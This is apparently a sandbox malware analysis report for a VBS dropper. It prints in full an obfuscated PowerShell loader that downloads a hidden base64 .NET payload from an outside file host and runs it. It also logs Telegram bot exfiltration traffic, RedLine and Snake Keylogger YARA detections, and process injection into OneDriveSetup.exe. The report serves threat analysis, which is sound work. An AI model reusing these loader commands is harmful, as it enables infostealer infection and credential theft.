                                                                                                                                                                      2024-11-26 08:33:47 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      11192.168.2.849730149.154.167.2204437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:49 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                      Host: api.telegram.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:33:49 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:49 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                      2024-11-26 08:33:49 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:03:32:46
                                                                                                                                                                      Start date:26/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs"
                                                                                                                                                                      Imagebase:0x7ff719660000
                                                                                                                                                                      File size:170'496 bytes
                                                                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:03:32:51
                                                                                                                                                                      Start date:26/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                      Imagebase:0x7ff6cb6b0000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:03:32:51
                                                                                                                                                                      Start date:26/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:03:32:53
                                                                                                                                                                      Start date:26/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                                                                                                                                                                      Imagebase:0x7ff6cb6b0000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:03:33:17
                                                                                                                                                                      Start date:26/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\OneDriveSetup.exe"
                                                                                                                                                                      Imagebase:0xb40000
                                                                                                                                                                      File size:30'870'320 bytes
                                                                                                                                                                      MD5 hash:0EA845F896C821E04009C0336D7547EC
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00007FFB4B2F37B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2028840309.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                        • Instruction ID: 80d06effbd9626e5df66878cd696b72ca40218f62898a5d05fb6b131923daca6
                                                                                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                        • Instruction Fuzzy Hash: F401677111CB0D8FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB45

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:13.7%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:25.6%
                                                                                                                                                                        Signature Coverage:39.3%
                                                                                                                                                                        Total number of Nodes:219
                                                                                                                                                                        Total number of Limit Nodes:32
                                                                                                                                                                        execution_graph 33059 c419c48 33060 c419c4f 33059->33060 33062 c419c55 33059->33062 33060->33062 33064 c419fd9 33060->33064 33065 c419358 33060->33065 33063 c419358 LdrInitializeThunk 33063->33064 33064->33062 33064->33063 33066 c41936a 33065->33066 33068 c41936f 33065->33068 33066->33064 33067 c419a9c LdrInitializeThunk 33067->33066 33068->33066 33068->33067 33069 851e568 33073 851e574 33069->33073 33070 851e616 33094 c41d9d8 33070->33094 33098 c41d9c8 33070->33098 33071 851e632 33102 c41de1f 33071->33102 33106 c41de30 33071->33106 33072 851e639 33080 c412580 33073->33080 33087 c412572 33073->33087 33081 c4125a2 33080->33081 33082 c412671 33081->33082 33085 c419358 LdrInitializeThunk 33081->33085 33110 c419578 33081->33110 33116 c41995f 33081->33116 33122 c419348 33081->33122 33082->33070 33085->33082 33088 c4125a2 33087->33088 33089 c412671 33088->33089 33090 c419578 2 API calls 33088->33090 33091 c419348 2 API calls 33088->33091 33092 c419358 LdrInitializeThunk 33088->33092 33093 c41995f 2 API calls 33088->33093 33089->33070 33090->33089 33091->33089 33092->33089 33093->33089 33095 c41d9fa 33094->33095 33096 c419578 2 API calls 33095->33096 33097 c41dac7 33095->33097 33096->33097 33097->33071 33099 c41d9d6 33098->33099 33100 c419578 2 API calls 33099->33100 33101 c41dac7 33099->33101 33100->33101 33101->33071 33103 c41de52 33102->33103 33104 c419578 2 API calls 33103->33104 33105 c41df1f 33103->33105 33104->33105 33105->33072 33107 c41de52 33106->33107 33108 c419578 2 API calls 33107->33108 33109 c41df1f 33107->33109 33108->33109 33109->33072 33115 c4195a9 33110->33115 33111 c41970c 33111->33082 33112 c419957 LdrInitializeThunk 33112->33111 33114 c419358 LdrInitializeThunk 33114->33115 33115->33111 33115->33112 33115->33114 33119 c419816 33116->33119 33117 c419957 LdrInitializeThunk 33120 c419ab4 33117->33120 33119->33117 33121 c419358 LdrInitializeThunk 33119->33121 33120->33082 33121->33119 33123 c41936a 33122->33123 33127 c41936f 33122->33127 33123->33082 33124 c419957 LdrInitializeThunk 33124->33123 33126 c419358 LdrInitializeThunk 33126->33127 33127->33123 33127->33124 33127->33126 33128 40cbdd 33129 40cbe9 _ftell 33128->33129 33172 40d534 HeapCreate 33129->33172 33132 40cc46 33233 41087e 71 API calls 8 library calls 33132->33233 33135 40cc4c 33136 40cc50 33135->33136 33137 40cc58 __RTC_Initialize 33135->33137 33234 40cbb4 62 API calls 3 library calls 33136->33234 33174 411a15 67 API calls 3 library calls 33137->33174 33139 40cc57 33139->33137 33141 40cc66 33142 40cc72 GetCommandLineA 33141->33142 33143 40cc6a 33141->33143 33175 412892 71 API calls 2 library calls 33142->33175 33235 40e79a 62 API calls 3 library calls 33143->33235 33146 40cc71 33146->33142 33147 40cc82 33236 4127d7 107 API calls 3 library calls 33147->33236 33149 40cc8c 33150 40cc90 33149->33150 33151 40cc98 33149->33151 33237 40e79a 62 API calls 3 library calls 33150->33237 33176 41255f 106 API calls 6 library calls 33151->33176 33154 40cc97 33154->33151 33155 40cc9d 33156 40cca1 33155->33156 33157 40cca9 33155->33157 33238 40e79a 62 API calls 3 library calls 33156->33238 33177 40e859 73 API calls 5 library calls 33157->33177 33160 40ccb0 33162 40ccb5 33160->33162 33163 40ccbc 33160->33163 33161 40cca8 33161->33157 33239 40e79a 62 API calls 3 library calls 33162->33239 33178 4019f0 OleInitialize 33163->33178 33166 40ccbb 33166->33163 33167 40ccd8 33168 40ccea 33167->33168 33240 40ea0a 62 API calls _doexit 33167->33240 33241 40ea36 62 API calls _doexit 33168->33241 33171 40ccef _ftell 33173 40cc3a 33172->33173 33173->33132 33232 40cbb4 62 API calls 3 library calls 33173->33232 33174->33141 33175->33147 33176->33155 33177->33160 33179 401ab9 33178->33179 33242 40b99e 33179->33242 33181 401abf 33182 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 33181->33182 33208 402467 33181->33208 33183 401dc3 CloseHandle GetModuleHandleA 33182->33183 33190 401c55 33182->33190 33255 401650 33183->33255 33185 401e8b FindResourceA LoadResource LockResource SizeofResource 33257 40b84d 33185->33257 33189 401c9c CloseHandle 33189->33167 33190->33189 33195 401cf9 Module32Next 33190->33195 33191 401ecb _memset 33192 401efc SizeofResource 33191->33192 33193 401f1c 33192->33193 33194 401f5f 33192->33194 33193->33194 33313 401560 __VEC_memcpy __fptostr 33193->33313 33197 401f92 _memset 33194->33197 33314 401560 __VEC_memcpy __fptostr 33194->33314 33195->33183 33204 401d0f 33195->33204 33199 401fa2 FreeResource 33197->33199 33200 40b84d _malloc 62 API calls 33199->33200 33201 401fbb SizeofResource 33200->33201 33202 401fe5 _memset 33201->33202 33203 4020aa LoadLibraryA 33202->33203 33205 401650 33203->33205 33204->33189 33207 401dad Module32Next 33204->33207 33206 40216c GetProcAddress 33205->33206 33206->33208 33209 4021aa 33206->33209 33207->33183 33207->33204 33208->33167 33209->33208 33287 4018f0 33209->33287 33211 40243f 33211->33208 33315 40b6b5 62 API calls 2 library calls 33211->33315 33213 4021f1 33213->33211 33299 401870 33213->33299 33215 402269 VariantInit 33216 401870 75 API calls 33215->33216 33217 40228b VariantInit 33216->33217 33218 4022a7 33217->33218 33219 4022d9 SafeArrayCreate SafeArrayAccessData 33218->33219 33304 40b350 33219->33304 33222 40232c 33223 402354 SafeArrayDestroy 33222->33223 33231 40235b 33222->33231 33223->33231 33224 402392 SafeArrayCreateVector 33225 4023a4 33224->33225 33226 4023bc VariantClear VariantClear 33225->33226 33306 4019a0 33226->33306 33229 40242e 33230 4019a0 65 API calls 33229->33230 33230->33211 33231->33224 33232->33132 33233->33135 33234->33139 33235->33146 33236->33149 33237->33154 33238->33161 33239->33166 33240->33168 33241->33171 33243 40b9aa _ftell _strnlen 33242->33243 33244 40b9b8 33243->33244 33247 40b9ec 33243->33247 33316 40bfc1 62 API calls __getptd_noexit 33244->33316 33246 40b9bd 33317 40e744 6 API calls 2 library calls 33246->33317 33318 40d6e0 62 API calls 2 library calls 33247->33318 33250 40b9f3 33319 40b917 120 API calls 3 library calls 33250->33319 33252 40b9ff 33320 40ba18 LeaveCriticalSection _doexit 33252->33320 33253 40b9cd _ftell 33253->33181 33256 4017cc ___crtGetEnvironmentStringsA 33255->33256 33256->33185 33258 40b900 33257->33258 33267 40b85f 33257->33267 33328 40d2e3 6 API calls __decode_pointer 33258->33328 33260 40b906 33329 40bfc1 62 API calls __getptd_noexit 33260->33329 33265 40b8bc RtlAllocateHeap 33265->33267 33266 40b870 33266->33267 33321 40ec4d 62 API calls 2 library calls 33266->33321 33322 40eaa2 62 API calls 7 library calls 33266->33322 33323 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 33266->33323 33267->33265 33267->33266 33269 40b8ec 33267->33269 33272 40b8f1 33267->33272 33274 401ebf 33267->33274 33324 40b7fe 62 API calls 4 library calls 33267->33324 33325 40d2e3 6 API calls __decode_pointer 33267->33325 33326 40bfc1 62 API calls __getptd_noexit 33269->33326 33327 40bfc1 62 API calls __getptd_noexit 33272->33327 33275 40af66 33274->33275 33277 40af70 33275->33277 33276 40b84d _malloc 62 API calls 33276->33277 33277->33276 33278 40af8a 33277->33278 33280 40af8c std::bad_alloc::bad_alloc 33277->33280 33330 40d2e3 6 API calls __decode_pointer 33277->33330 33278->33191 33285 40afb2 33280->33285 33331 40d2bd 73 API calls __cinit 33280->33331 33282 40afbc 33333 40cd39 RaiseException 33282->33333 33332 40af49 62 API calls std::exception::exception 33285->33332 33286 40afca 33288 401903 lstrlenA 33287->33288 33289 4018fc 33287->33289 33334 4017e0 33288->33334 33289->33213 33292 401940 GetLastError 33294 40194b MultiByteToWideChar 33292->33294 33295 40198d 33292->33295 33293 401996 33293->33213 33296 4017e0 72 API calls 33294->33296 33295->33293 33342 401030 GetLastError 33295->33342 33298 401970 MultiByteToWideChar 33296->33298 33298->33295 33300 40af66 74 API calls 33299->33300 33301 40187c 33300->33301 33302 401885 SysAllocString 33301->33302 33303 4018a4 33301->33303 33302->33303 33303->33215 33305 40231a SafeArrayUnaccessData 33304->33305 33305->33222 33307 4019df VariantClear 33306->33307 33308 4019aa InterlockedDecrement 33306->33308 33307->33229 33308->33307 33309 4019b8 33308->33309 33309->33307 33310 4019c2 SysFreeString 33309->33310 33311 4019c9 33309->33311 33310->33311 33346 40aec0 63 API calls 2 library calls 33311->33346 33313->33193 33314->33197 33315->33208 33316->33246 33318->33250 33319->33252 33320->33253 33321->33266 33322->33266 33324->33267 33325->33267 33326->33272 33327->33274 33328->33260 33329->33274 33330->33277 33331->33285 33332->33282 33333->33286 33335 4017e9 33334->33335 33340 401844 33335->33340 33341 40182d 33335->33341 33343 40b783 72 API calls 5 library calls 33335->33343 33339 40186d MultiByteToWideChar 33339->33292 33339->33293 33340->33339 33345 40b743 62 API calls 2 library calls 33340->33345 33341->33340 33344 40b6b5 62 API calls 2 library calls 33341->33344 33343->33341 33344->33340 33345->33340 33346->33307

                                                                                                                                                                        Executed Functions

